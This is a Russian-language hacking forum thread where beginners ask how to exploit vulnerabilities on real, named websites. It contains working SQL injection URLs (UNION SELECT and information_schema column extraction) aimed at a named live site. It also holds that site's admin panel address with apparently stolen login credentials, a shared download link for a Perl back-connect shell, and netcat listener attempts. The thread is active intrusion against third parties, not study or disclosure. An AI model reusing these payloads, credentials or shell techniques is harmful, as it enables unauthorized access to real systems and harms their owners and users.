Ваши вопросы по уязвимостям.

тебе не как..

 

Нашел SQL inj, но никак не смог вытащит что-то. Кто поможет? Читал темы тут, но никак не смог. В ГЕТ параметре не фильтруется ид.
Еще, нашел на несколькиx сайтаx раскрытие путей, а что можно сними сделать?
И как найти php inclue ?

Подробно объясните,please...

 

тынц

 

ТЫНЦ не помогло, вот сайт где скул inj. http://dag-auto.ru/userauto.php?PHPSESSID=LALALA&start=1blabla

 

Пытаюсь на сервере прослушать порт netcat'ом, но ничё не получается оО... выдает:

Code:

> nc -l -p 31337
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
	  [-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
	  [-x proxy_address[:port]] [hostname] [port[s]]

Хотя я и могу запустить бинд на перле, но хочу понять как это сделать netcat'ом.

 

Еще вопрос:
Соединяюсь с сервером чз netcat, потом ввожу команду ssh 123.123.123.123, в ответ приходит следующая надпись

Code:

Pseudo-terminal will not be allocated because stdin is not a terminal

Что есть этот самый терминал..? где можно почитать про это?

 

Это означает, что тебе нужен бекконект который привязывется к терминалу. Вот держи залил тебе на перле http://www.sendspace.com/file/tsb30y

 

Как им правильно пользоваться?
Выдает:

Code:

ERROR: No more pty's avaliable

P.S. Может у кого есть ttyX, что-то нигде не нашел.

 

информация о табицах не доступна...
возможен просмотр?

Code:

http://www.drummersworld.com/dsp/category.php?id=e90a535886a467144e56b47de5e563b3&catname=Cymbals&catid=-147+union+select+1,2,3,4,5,6,7,8,9,10,database(),12,13,14,15,16,17,18,19,20,21,22--

 

Electr0n там видимо фильтр на выуживание таблиц, потому что если методом подбора подобрать допустим таблицу users, то поля можно свободно получить, без брута
Вот тебе админка:
http://www.drummersworld.com/dsp/admin/admin.php
technology
fuckwhohackthisshop

 

http://www.drummersworld.com/dsp/category.php?id=e90a535886a467144e56b47de5e563b3&catname=Cymbals&catid=-147+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.columns+where+table_name=0x7573657273+--+

 

Нашёл скулу

Что возможно с ней сделать?

 

инъекция в лимите, читать

 

линк что читать =) многое перечитал

 

кароч есть гугл для этого) я нагуглил и ты нагуглишь

 

думаешь не искал?) подсказку хотябы...

 

подсказка

http://www.google.ru/search?hl=ru&source=hp&q=sql+%D0%B8%D0%BD%D1%8A%D0%B5%D0%BA%D1%86%D0%B8%D1%8F+%D0%B2+%D0%BB%D0%B8%D0%BC%D0%B8%D1%82%D0%B5&aq=f&aqi=&aql=&oq=&gs_rfai=

 

sql инъекци%D 1Џ РІ лимите криво выводиться запрос на поиск =/

 

млядь sql инъекция в лимите .... сложно понять и в гугл вбить?

 

Да искал,до гугла сюда бы не написал